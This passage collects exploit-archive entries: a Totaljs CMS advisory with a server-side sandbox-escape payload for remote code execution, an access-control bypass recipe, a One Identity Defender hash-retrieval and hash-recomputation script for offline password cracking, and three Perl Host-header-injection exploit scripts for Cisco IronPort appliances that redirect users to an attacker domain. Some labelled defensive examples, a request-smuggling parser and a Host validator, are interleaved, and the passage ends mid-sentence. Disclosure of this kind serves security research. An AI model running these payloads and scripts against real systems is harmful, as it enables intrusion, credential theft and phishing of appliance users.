Totaljs CMS 12.0 Widget Creation Code Injection

Totaljs CMS version 12.0 suffers from an authenticated code injection vulnerability during widget creation.


MD5 | 5a2beed48db8d3b90204e1dc4c6cc04d

[+] Author/Discoverer: Riccardo Krauter @CertimeterGroup

[+] Title: Totaljs CMS Authenticated Code injection on widget creation.

[+] Affected software: Totaljs CMS 12.0

[+] Description:

An authenticated user with the “widgets” privilege can gain RCE on the
remote server by creating a malicious widget that contains a special tag
with JavaScript code, which the back end evaluates server side.
While the back end evaluates the tag, the sandbox object can be escaped
with the following payload:
<script total>global.process.mainModule.require('child_process').exec('RCE here');</script>

[+] Steps to reproduce:

1) browse to http://localhost:8000/admin/widgets/
2) click on create
3) paste the payload into the source code field
4) click on save

[+] Project link: https://github.com/totaljs/cms

[+] Original report and details:
https://github.com/beerpwn/CVE/blob/master/Totaljs_disclosure_report/report_final.pdf

[+] Timeline:

- 13/02/2019 -> reported the issue to the vendor

.... many pings in between

- 18/06/2019 -> pinged the vendor for the last time

- 30/08/2019 -> reported to seclist




Totaljs CMS 12.0 Improper Access Control

Totaljs CMS version 12.0 suffers from a broken access control on an API call.


MD5 | 1174a2d9a236e5d9d48612db561d2db1

[+] Author/Discoverer: Riccardo Krauter @CertimeterGroup

[+] Title: Totaljs CMS Broken Access Control on the API call

[+] Affected software: Totaljs CMS 12.0

[+] Description: An authenticated user with limited privileges can access
resources they do not own by calling the associated API directly.
The CMS enforces privileges correctly only for the front-end resource
paths, not for the API requests. This leads to vertical and horizontal
privilege escalation.

[+] Steps to reproduce:

1) create a user with any single privilege (e.g. “Notices”).
2) log in as this user and browse to http://localhost:8000/admin/notices/
3) copy the __admin cookie, which by default identifies the session user
4) in Burp, create a POST request to the path
/admin/api/pages/preview/ with body {"body":"","template":"default"}
5) a 200 response comes back, which means an API call that the user has
no privilege to use was executed successfully.

[+] Project link: https://github.com/totaljs/cms

[+] Original report and details:
https://github.com/beerpwn/CVE/blob/master/Totaljs_disclosure_report/report_final.pdf

[+] Timeline:

- 13/02/2019 -> reported the issue to the vendor

.... many pings in between

- 18/06/2019 -> pinged the vendor for the last time

- 30/08/2019 -> reported to seclist




One Identity Defender 5.9.3 Insecure Cryptographic Storage

One Identity Defender version 5.9.3 suffers from an insecure cryptographic storage vulnerability.


MD5 | 8468fed0a43e9e49979ae592bcf56b4d

Title: One Identity Defender - Insecure Cryptographic Storage
Date: 01 September 2019

Affected Software:
==================
One Identity Defender 5.9.3
Other versions are likely also vulnerable.

Insecure Cryptographic Storage:
==============================
Defender stores token seeds, PAP secrets, and user passwords in Active Directory attributes that are readable by all authenticated users. Defender passwords are hashed with MD5 combined with a static obfuscation key, so the computed hash can be read from the defender-userTokenData attribute in Active Directory and then used in an offline brute-force attack.

Hash Retrieval:

PS C:\Users\Duras> Get-ADUser Martok -Properties * | Select DistinguishedName, ObjectGUID, defender-userTokenData

DistinguishedName ObjectGUID defender-userTokenData
----------------- ---------- ----------------------
CN=Martok,CN=Users,DC=QonoS,DC=local 52126f3a-723d-4b7e-a6ae-ccc2279e8618 {B:144:0505D1F541F69C63315DD85FBBDB7B4DC9E500000000000000000000000000000000000000000000000000000000000000000000000...

Hash Calculation:

#!/usr/bin/env python3
# Recomputes the Defender password hash for one user from three inputs:
# the static obfuscation key, the clear-text password and the user's
# Active Directory objectGUID.
import hashlib
import uuid

guid = '52126f3a-723d-4b7e-a6ae-ccc2279e8618'   # objectGUID of the user
password = 'secret'
key = '45f88b08118bf03b8d55e452f77c2e8b'        # static obfuscation key

# objectGUID in the byte order AD stores it: the first three GUID fields
# are little-endian. uuid.bytes_le yields exactly that order.
guid_bytes = uuid.UUID(guid).bytes_le

# The password is hashed as UTF-16LE (each character followed by a NUL).
password_bytes = password.encode('utf-16-le')

# MD5 over key || password || GUID. The digest is the value that appears
# right after the leading 0505 bytes of the defender-userTokenData blob
# shown above.
digest = hashlib.md5(bytes.fromhex(key) + password_bytes + guid_bytes).hexdigest()
print(digest)

[duras@qonos ~]$ ./hash.py
d1f541f69c63315dd85fbbdb7b4dc9e5

Contact:
========
spicyitalian[at]protonmail[dot]com



Cisco Content Security Management Virtual Appliance M600V IronPort Header Injection

Cisco Content Security Management Virtual Appliance M600V IronPort remote host header injection exploit.


MD5 | 229be091f2335df90cbf4ec41f426693

#!/usr/bin/perl -w
#
#
# Cisco Content Security Management Virtual Appliance M600V IronPort Remote Header 'Host' Injection
#
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# [test@localhost ironport]$ perl ironport_m600v.pl https://192.168.1.1
# # Cisco Content Security Management Virtual Appliance M600V IronPort Remote Header 'Host' Injection
# # =================================================================================================
# # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
# # > Host => scam-page.com
# # > User-Agent => iCab/4.0 (Macintosh; U; Intel Mac OS X)
# # > Content-Type => application/x-www-form-urlencoded
# # < Cache-Control => no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
# # < Date => Wed, 04 Sep 2019 09:09:09 GMT
# # < Pragma => no-cache
# # < Location => https://scam-page.com/login?CSRFKey=df80e845-fe20-739b-e96a-71d7331b5e6f&referrer=https%3A%2F%2Fscam-page.com%2FSearch
# # < Server => glass/1.0 Python/2.6.4
# # < Content-Type => text/html
# # < Expires => Wed, 04 Sep 2019 09:09:09 GMT
# # < Last-Modified => Wed, 04 Sep 2019 09:09:09 GMT
# # < Client-Date => Wed, 04 Sep 2019 09:09:09 GMT
# # < Client-Peer => 192.168.1.1:443
# # < Client-Response-Num => 1
# # < Client-SSL-Cert-Issuer =>
# # < Client-SSL-Cert-Subject =>
# # < Client-SSL-Cipher => DHE-RSA-AES128-GCM-SHA256
# # < Client-SSL-Socket-Class => IO::Socket::SSL
# # < Client-SSL-Warning => Peer certificate not verified
# # < Refresh => 0; URL=https://scam-page.com/login?CSRFKey=df80e845-fe20-739b-e96a-71d7331b5e6f&referrer=https%3A%2F%2Fscam-page.com%2FSearch
# # < Set-Cookie => sid=xPLafDYAZCboH6s0rHzX; expires=Friday, 06-Sep-2019 09:09:09 GMT; httponly; Path=/; secure
# # < Title => : Redirecting
# # < X-Frame-Options => SAMEORIGIN
# # =================================================================================================
# # IronPort is Poisoned => https://scam-page.com/login?CSRFKey=df80e845-fe20-739b-e96a-71d7331b5e6f&referrer=https%3A%2F%2Fscam-page.com%2FSearch
# [test@localhost ironport]$
#
#
# Request Smuggling Attack - Input and Data Validation
#
# Implementation
#
# o Attack applies to: vulnerable web servers and proxies.
#
#
# Description
#
# HTTP request smuggling is a technique to take advantage
# of discrepancies in parsing when one or more HTTP devices
# are between the user and the web server. An attacker may
# be able to 'smuggle' malicious requests through a packet
# inspector, firewall or web proxy server. This technique
# may leave the web server vulnerable to various attacks
# such as web cache poisoning, or allow the attacker to
# request protected files on the web server.
#
# Impact
#
# o Cache poisoning: An attacker may be able to 'rewire'
#   a web server cache so that one page is served when
#   another is requested.
#
# o Malicious requests: An attacker may be able to smuggle
#   a malicious request through a packet inspector, web proxy
#   server, or firewall because of discrepancies in security
#   rules between it and the web server.
#
# o Credential hijacking: An attacker may be able to insert
#   a request into the HTTP flow, thereby manipulating the
#   web server's request/response sequencing, which can allow
#   the attacker to hijack a third party's credentials.
#
# Vulnerabilities
#
# o Web server, packet inspector, firewall, or web proxy server
# misconfiguration.
#
# Countermeasures
#
# o Deploy a non-vulnerable web server: Web servers with a very
#   strict HTTP parsing procedure may not be vulnerable to this
#   attack.
#
# o Change all pages to non-cacheable: This will force the proxy
#   to retrieve the pages from the web server every time. Although
#   this is better from a security perspective, the reality is that
#   caching significantly improves the server's performance and
#   reduces latency. Thus, other countermeasures are a better long
#   term fix.
#
# o Rewrite all HTTP requests: Install a module on a firewall or
#   proxy server to rewrite each HTTP request on the fly to a known
#   valid request type.
#
# o Update your web server: Contact the web server vendor and check
#   if a patch has been released for this type of vulnerability.
#
#
# Example
#
# This example describes the classic request smuggling attack
# in which an attacker can poison one page with the contents
# of another. In this example, the attacker combines one POST
# request and two GET requests into a single malformed HTTP
# request. The HTTP request has two Content-Length headers
# with conflicting values. Some servers, such as IIS and
# Apache simply reject such a request, but others attempt to
# ‘fix’ the error. Fortunately for the attacker, certain web
# servers and web proxies choose to pay attention to different
# sections of the malformed request.
#
# In this case let "somewhere.com" be the DNS name of the web
# server behind the proxy, and suppose that "/poison.html" is
# a static and cacheable HTML page on the web server.
#
#  1  POST http://somewhere.com/example.html HTTP/1.1\r\n
#  2  Host: somewhere.com\r\n
#  3  Connection: Keep-Alive\r\n
#  4  Content-Type: application/x-www-form-urlencoded\r\n
#  5  Content-Length: 0\r\n
#  6  Content-Length: 53\r\n
#  7  \r\n
#  8  GET /poison.html HTTP/1.1\r\n
#  9  Host: somewhere.com\r\n
# 10  Bla: 
# 11  GET http://somewhere.com/index.html HTTP/1.1\r\n
# 12  Host: somewhere.com\r\n
# 13  Connection: Keep-Alive\r\n
# 14  \r\n
#
# Note that line 10 is the only line that does not end in
# CRLF ("\r\n") and instead there is a space ("Bla: ").
# This request is sent to a web server via a proxy server.
#
# First, this message is parsed by the proxy. When the proxy server
# parses the message, it finds the POST request (lines 1-7) followed by
# the two conflicting Content-Length's (lines 5 and 6). The proxy ignores
# the first header and believes the body is 53 bytes long (which is exactly
# the number of bytes used by lines 8-10 including CRLFs). The proxy then
# sees lines 11-14 and interprets them as a second request.
#
# Second, the message is parsed by the web server. Although the web server
# receives the same message, when it sees the first Content-Length in line 5,
# it thinks that the body of the POST request is 0 bytes in length.
# Therefore it finds the second request in line 8 and interprets line 11
# as the value of "Bla: " in line 10 because of the missing CRLF.
#
#
# At this point the web server responds to the GET in line 8 by sending
# the content of /poison.html to the proxy. The proxy, expecting a
# response to the GET request in line 11, mistakenly matches the reply
# from the webserver with contents from /poison.html to the page /index.html.
# Therefore, the contents of /poison.html are cached under the name /index.html
# on the proxy. Now any user who requests http://somewhere.com/index.html
# through the proxy will receive the contents of http://somewhere.com/poison.html
# instead.
#
# There are several options available to mitigate this attack but all of
# them have their downside. If possible, use a well tested web server such
# as Apache or IIS. Otherwise, you can turn off server-side page caching,
# but this can lead to significant performance problems such as increased
# server load and latency. A final option is to use SSL communication for
# everything (HTTPS instead of HTTP), but this too has an associated
# performance overhead.
#
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;


my $host = shift || '';
my $attacker = shift || 'scam-page.com';


print "# Cisco Content Security Management Virtual Appliance M600V IronPort Remote Header 'Host' Injection
# =================================================================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
";
if ($host !~ m/^http/){
    print "# e.g. perl $0 https://target:port/ scam-page.com
";
    exit;
}

my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(
    protocols_allowed => ['http', 'https'],
    ssl_opts => { verify_hostname => 0 }
);
$browser->timeout(10);
$browser->agent($user_agent);

my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], "");
$request->header("Host" => $attacker);
my $response = $browser->request($request);
print "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
say "# > $_ => ", $request->header($_) for $request->header_field_names;
say "# < $_ => ", $response->header($_) for $response->header_field_names;
print "# =================================================================================================\n";
if (defined ($response->header('Location')) and ($response->header('Location') =~ m/$attacker/i)){
    printf ("# IronPort is Poisoned => %s\n", $response->header('Location'));
    exit;
} else {
    printf ("# Exploit failed!\n");
    exit;
}
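The parsing discrepancy described in the comment block of the script above, as an added example that is not part of Todor Donev's script: a toy HTTP/1.1 request splitter that can be told to honour the first Content-Length (the origin server in that text), the last one (the proxy), or to refuse a message whose Content-Length values conflict, which is what a strictly parsing server does. It is run over the exact 14-line request from the text; the parser is a teaching model, not a real proxy.

```python
"""Added example: how a proxy and an origin server split the same byte
stream differently when two Content-Length headers disagree, and the
strict policy that refuses the message instead. Toy parser, not a proxy."""

# The 14-line request from the comment block above, as raw bytes. Line 10
# ("Bla: ") deliberately has no CRLF, so lines 8-10 are exactly 53 bytes.
REQUEST = (
    b"POST http://somewhere.com/example.html HTTP/1.1\r\n"
    b"Host: somewhere.com\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 0\r\n"
    b"Content-Length: 53\r\n"
    b"\r\n"
    b"GET /poison.html HTTP/1.1\r\n"
    b"Host: somewhere.com\r\n"
    b"Bla: "
    b"GET http://somewhere.com/index.html HTTP/1.1\r\n"
    b"Host: somewhere.com\r\n"
    b"Connection: Keep-Alive\r\n"
    b"\r\n"
)


class ParseError(Exception):
    """Raised when the strict policy refuses a message."""


def split_requests(data, policy):
    """Split a byte stream into (request_line, headers, body) tuples.

    policy is one of:
      "first"  honour the first Content-Length (the origin server in the text)
      "last"   honour the last Content-Length (the proxy in the text)
      "strict" refuse a message whose Content-Length values conflict
    """
    requests = []
    pos = 0
    while pos < len(data):
        end = data.find(b"\r\n\r\n", pos)
        if end < 0:
            raise ParseError("header block not terminated")
        lines = data[pos:end].decode("latin-1").split("\r\n")
        headers = []
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers.append((name.strip().lower(), value.strip()))
        lengths = [v for n, v in headers if n == "content-length"]
        if policy == "strict" and len(set(lengths)) > 1:
            raise ParseError("conflicting Content-Length values: %s" % lengths)
        length = 0
        if lengths:
            length = int(lengths[0] if policy == "first" else lengths[-1])
        body_start = end + 4
        body = data[body_start:body_start + length]
        requests.append((lines[0], headers, body))
        pos = body_start + length
    return requests


def request_lines(data, policy):
    """Just the request lines each parser believes it saw."""
    return [req[0] for req in split_requests(data, policy)]


if __name__ == "__main__":
    for policy in ("last", "first"):
        print(policy, request_lines(REQUEST, policy))
    try:
        split_requests(REQUEST, "strict")
    except ParseError as err:
        print("strict:", err)
```

The "last" parser sees the POST followed by a GET for /index.html, the "first" parser sees the same POST followed by a GET for /poison.html, which is the mismatch that lets the proxy cache the wrong body; the "strict" parser is the "deploy a non-vulnerable web server" countermeasure from the comment block.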

Cisco Email Security Virtual Appliance C300V IronPort Header Injection

Cisco Email Security Virtual Appliance C300V IronPort remote host header injection exploit.


MD5 | 58c6e4353b033250b2b8241c3f4cd6e3

#!/usr/bin/perl -w
#
#
# Cisco Email Security Virtual Appliance C300V IronPort Remote Header 'Host' Injection
#
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# [test@localhost ironport]$ perl ironport_c300v.pl https://192.168.1.1
# # Cisco Email Security Virtual Appliance C300V IronPort Remote Header 'Host' Injection
# # ====================================================================================
# # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
# # > Host => scam-page.com
# # > User-Agent => Mozilla/5.0 (compatible; Konqueror/4.1; Linux 2.6.27.7-134.fc10.x86_64; X11; x86_64) KHTML/4.1.3 (like Gecko) Fedora/4.1.3-4.fc10
# # > Content-Type => application/x-www-form-urlencoded
# # < Cache-Control => no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
# # < Date => Wed, 04 Sep 2019 09:38:42 GMT
# # < Server => glass/1.0 Python/2.6.4
# # < Content-Type => text/html; charset=UTF-8
# # < Expires => Wed, 04 Sep 2019 09:38:42 GMT
# # < Last-Modified => Wed, 04 Sep 2019 09:38:42 GMT
# # < Client-Date => Wed, 04 Sep 2019 09:38:43 GMT
# # < Client-Peer => 192.168.1.1:443
# # < Client-Response-Num => 1
# # < Client-SSL-Cert-Issuer =>
# # < Client-SSL-Cert-Subject =>
# # < Client-SSL-Cipher => DHE-RSA-AES128-GCM-SHA256
# # < Client-SSL-Socket-Class => IO::Socket::SSL
# # < Client-SSL-Warning => Peer certificate not verified
# # < Link => <https://scam-page.com/scfw/1y-11.1.1-042/yui/container/assets/container.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.1.1-042/yui/button/assets/skins/sam/button.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.1.1-042/yui/menu/assets/menu.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.1.1-042/yui/tabview/assets/tabview.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.1.1-042/yui/tabview/assets/border_tabs.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.1.1-042/yui/datatable/assets/datatable.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.1.1-042/yui/datatable/assets/datatable-core.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.1.1-042/yui/assets/skins/sam/editor.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.1.1-042/yui/calendar/assets/calendar.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.1.1-042/yui/assets/skins/sam/progressbar.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.1.1-042/skins/IP/tabview.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.1.1-042/images/ironport_favicon.ico>; rel="icon"; type="image/x-icon"<https://scam-page.com/scfw/1y-11.1.1-042/images/ironport_favicon.ico>; rel="shortcut icon"; type="image/x-icon"<https://scam-page.com/scfw/1y-11.1.1-042/yui/paginator/assets/skins/sam/paginator.css>; rel="stylesheet"; type="text/css"
# # < Set-Cookie => sid=WggkxsWtZGlAgvFwMWKT; httponly; Path=/; secure
# # < Title => Cisco Email Security Virtual Appliance C300V (scam-page.com) - Access Denied
# # < X-Frame-Options => SAMEORIGIN
# # ====================================================================================
# # IronPort is Poisoned! Exploitation successfully
# # [test@localhost ironport]$
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;


my $host = shift || '';
my $attacker = shift || 'scam-page.com';


print "# Cisco Email Security Virtual Appliance C300V IronPort Remote Header 'Host' Injection
# ====================================================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
";
if ($host !~ m/^http/){
    print "# e.g. perl $0 https://target:port/ scam-page.com
";
    exit;
}

my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(
    protocols_allowed => ['http', 'https'],
    ssl_opts => { verify_hostname => 0 }
);
$browser->timeout(10);
$browser->agent($user_agent);

my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], "");
$request->header("Host" => $attacker);
my $response = $browser->request($request);
print "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
say "# > $_ => ", $request->header($_) for $request->header_field_names;
say "# < $_ => ", $response->header($_) for $response->header_field_names;
print "# ====================================================================================\n";
if (defined ($response->content) and ($response->content =~ m/$attacker/)){
    print "# IronPort is Poisoned! Exploitation successfully\n";
    exit;
} else {
    print "# Exploitation failed!!!\n";
    exit;
}
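Both scripts above decide success by looking for the client-supplied Host value in the response (the M600V script in the Location header, the C300V script in the body). As an added example that is not part of Todor Donev's scripts, here is that check written as a defender-side test over a constructed response modelled on the M600V output, together with the Host allow-list validation an origin should apply before building redirects from the header. The response values and the `sma.example.internal` allow-list entry are made up.

```python
"""Added example: report which parts of an HTTP response echo a
client-supplied Host value, and validate Host against an allow-list."""
import re
from urllib.parse import urlsplit

# Constructed response, modelled on the M600V output quoted in the first
# script (URLs shortened, CSRF token and session id replaced by placeholders).
SAMPLE_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Location: https://scam-page.com/login?CSRFKey=PLACEHOLDER"
    "&referrer=https%3A%2F%2Fscam-page.com%2FSearch\r\n"
    "Refresh: 0; URL=https://scam-page.com/login?CSRFKey=PLACEHOLDER\r\n"
    "Set-Cookie: sid=PLACEHOLDER; httponly; Path=/; secure\r\n"
    "X-Frame-Options: SAMEORIGIN\r\n"
    "\r\n"
    "<html><head><title>: Redirecting</title></head></html>"
)

URL_RE = re.compile(r"https?://[^\s;,\"'<>]+")


def parse_response(raw):
    """Split a raw response into (status_line, [(name, value)], body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body


def _contains_host(text, host):
    """True if host is the authority of a URL in text, or appears as a
    whole token (so a subdomain like x.scam-page.com does not count)."""
    host = host.lower()
    for url in URL_RE.findall(text):
        if urlsplit(url).hostname == host:
            return True
    pattern = r"(?<![\w.-])%s(?![\w-])" % re.escape(host)
    return re.search(pattern, text.lower()) is not None


def reflected_fields(raw, supplied_host):
    """Names of the headers (plus 'body') that echo supplied_host."""
    _, headers, body = parse_response(raw)
    hits = [name for name, value in headers if _contains_host(value, supplied_host)]
    if _contains_host(body, supplied_host):
        hits.append("body")
    return hits


# host[:port] or [ipv6][:port]; anything else is rejected outright.
HOST_RE = re.compile(
    r"^(?:\[(?P<v6>[0-9a-f:.]+)\]|(?P<name>[a-z0-9.-]+))(?::(?P<port>\d{1,5}))?$"
)


def validate_host(host_header, allowed_hosts):
    """Accept a Host header only if its host part is on the allow-list.
    Comparison is case-insensitive, an optional port is tolerated and
    IPv6 literals must be bracketed, as in [::1]:8443."""
    if not host_header:
        return False
    match = HOST_RE.match(host_header.strip().lower())
    if not match:
        return False
    if match.group("port") and not 0 < int(match.group("port")) < 65536:
        return False
    host = match.group("v6") or match.group("name")
    return host in {h.lower() for h in allowed_hosts}


if __name__ == "__main__":
    print(reflected_fields(SAMPLE_RESPONSE, "scam-page.com"))
    print(validate_host("SMA.example.internal:443", {"sma.example.internal"}))
    print(validate_host("scam-page.com", {"sma.example.internal"}))
```

A hit in Location or Refresh is exactly the condition the M600V script reports as "Poisoned", and a hit in "body" is what the C300V script looks for; refusing the request when validate_host fails removes the reflected value before any redirect or page is built from it.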

Cisco Email Security Virtual Appliance C380 IronPort Header Injection

Cisco Email Security Virtual Appliance C380 IronPort remote host header injection exploit.


MD5 | 59fdeb6b686e0eb34a78c58ed8e75d61

#!/usr/bin/perl -w
#
#
# Cisco Email Security Virtual Appliance C380 IronPort Remote Header 'Host' Injection
#
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# [test@localhost ironport]$ perl ironport_c380.pl https://192.168.1.1
# # Cisco Email Security Virtual Appliance C380 IronPort Remote Header 'Host' Injection
# # ===================================================================================
# # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
# # > Host => scam-page.com
# # > User-Agent => Emacs-W3/4.0pre.46 URL/p4.0pre.46 (i686-pc-linux; X11)
# # > Content-Type => application/x-www-form-urlencoded
# # < Cache-Control => no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
# # < Date => Wed, 04 Sep 2019 11:31:23 GMT
# # < Server => glass/1.0 Python/2.6.4
# # < Content-Type => text/html; charset=UTF-8
# # < Expires => Wed, 04 Sep 2019 11:31:23 GMT
# # < Last-Modified => Wed, 04 Sep 2019 11:31:23 GMT
# # < Client-Date => Wed, 04 Sep 2019 11:31:24 GMT
# # < Client-Peer => 192.168.1.1:443
# # < Client-Response-Num => 1
# # < Client-SSL-Cert-Issuer =>
# # < Client-SSL-Cert-Subject =>
# # < Client-SSL-Cipher => DHE-RSA-AES128-GCM-SHA256
# # < Client-SSL-Socket-Class => IO::Socket::SSL
# # < Client-SSL-Warning => Peer certificate not verified
# # < Link => <https://scam-page.com/scfw/1y-11.0.1-027/yui/container/assets/container.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.0.1-027/yui/button/assets/skins/sam/button.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.0.1-027/yui/menu/assets/menu.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.0.1-027/yui/tabview/assets/tabview.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.0.1-027/yui/tabview/assets/border_tabs.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.0.1-027/yui/datatable/assets/datatable.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.0.1-027/yui/datatable/assets/datatable-core.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.0.1-027/yui/assets/skins/sam/editor.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.0.1-027/yui/calendar/assets/calendar.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.0.1-027/yui/assets/skins/sam/progressbar.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.0.1-027/skins/IP/tabview.css>; rel="stylesheet"; type="text/css"<https://scam-page.com/css>; rel="stylesheet"; type="text/css"<https://scam-page.com/scfw/1y-11.0.1-027/images/ironport_favicon.ico>; rel="icon"; type="image/x-icon"<https://scam-page.com/scfw/1y-11.0.1-027/images/ironport_favicon.ico>; rel="shortcut icon"; type="image/x-icon"<https://scam-page.com/scfw/1y-11.0.1-027/yui/paginator/assets/skins/sam/paginator.css>; rel="stylesheet"; type="text/css"
# # < Set-Cookie => sid=DxXpWgmfYKcWGpQBQNTp; httponly; Path=/; secure
# # < Title => Cisco Email Security Appliance C380 (scam-page.com) - Access Denied
# # < X-Frame-Options => SAMEORIGIN
# # ===================================================================================
# # IronPort is Poisoned! Exploitation successfully
# [test@localhost ironport]$
#
#
# Request Smuggling Attack - Input and Data Validation
#
# Implementation
#
# o Attack Applies To Vulnerable web servers and proxies.
#
#
# Description
#
# HTTP request smuggling is a technique to take advantage
# of discrepancies in parsing when one or more HTTP devices
# are between the user and the web server. An attacker may
# be able to 'smuggle' malicious requests through a packet
# inspector, firewall or web proxy server. This technique
# may leave the web server vulnerable to various attacks
# such as web cache poisoning, or allow the attacker to
# request protected files on the web server.
#
# Impact
#
# Cache poisoning: An attacker may be able to ‘rewire’
# o a web server cache so that one page is served when
# another is requested.
#
# Malicious requests: An attacker may be able to smuggle
# o a malicious request through a packet inspector, web proxy
# server, or firewall because of discrepancies in security
# rules between it and the web server.
#
# Credential hijacking: An attacker may be able to insert
# o a request into the HTTP flow, thereby manipulating the
# web server’s request/response sequencing, which can allow
# the attacker to hijack a third party’s credentials.
#
# Vulnerabilities
#
# o Web server, packet inspector, firewall, or web proxy server
# misconfiguration.
#
# Countermeasures
#
# Deploy a non-vulnerable web server: Web servers with a very
# o strict HTTP parsing procedure may not be vulnerable to this
# attack.
#
# Change all pages to non-cacheable: This will force the proxy
# to retrieve the pages from the web server every time. Although
# o this is better from a security perspective, the reality is that
# caching significantly improves the server's performance and
# reduces latency. Thus, other countermeasures are a better long
# term fix.
#
# o Rewrite all HTTP requests: Install a module on a firewall or
# proxy server to rewrite each HTTP request on the fly to a known
# valid request type.
#
# o Update your web server: Contact the web server vendor and check
# if there has been a patch released for a this type of vulnerability.
#
#
# Example
#
# This example describes the classic request smuggling attack
# in which an attacker can poison one page with the contents
# of another. In this example, the attacker combines one POST
# request and two GET requests into a single malformed HTTP
# request. The HTTP request has two Content-Length headers
# with conflicting values. Some servers, such as IIS and
# Apache, simply reject such a request, but others attempt to
# ‘fix’ the error. Fortunately for the attacker, certain web
# servers and web proxies choose to pay attention to different
# sections of the malformed request.
#
# In this case let "somewhere.com" be the DNS name of the web
# server behind the proxy, and suppose that "/poison.html" is
# a static and cacheable HTML page on the web server.
#
# 1  POST http://somewhere.com/example.html HTTP/1.1\r\n
# 2  Host: somewhere.com\r\n
# 3  Connection: Keep-Alive\r\n
# 4  Content-Type: application/x-www-form-urlencoded\r\n
# 5  Content-Length: 0\r\n
# 6  Content-Length: 53\r\n
# 7  \r\n
# 8  GET /poison.html HTTP/1.1\r\n
# 9  Host: somewhere.com\r\n
# 10 Bla: 
# 11 GET http://somewhere.com/index.html HTTP/1.1\r\n
# 12 Host: somewhere.com\r\n
# 13 Connection: Keep-Alive\r\n
# 14 \r\n
#
# Note that line 10 is the only line that does not end in
# CRLF ("\r\n"): it ends with the space after "Bla:", so on the
# wire line 11 follows immediately and lines 10 and 11 form a
# single header line.
# This request is sent to a web server via a proxy server.
#
# First, this message is parsed by the proxy. When the proxy server
# parses the message, it finds the POST request (lines 1-7) followed by
# the two conflicting Content-Length's (lines 5 and 6). The proxy ignores
# the first header and believes the body is 53 bytes long (which is exactly
# the number of bytes used by lines 8-10 including CRLFs). The proxy then
# sees lines 11-14 and interprets them as a second request.
#
# Second, the message is parsed by the web server. Although the web server
# receives the same message, when it sees the first Content-Length in line 5,
# it thinks that the body of the POST request is 0 bytes in length.
# Therefore it finds the second request in line 8 and interprets line 11
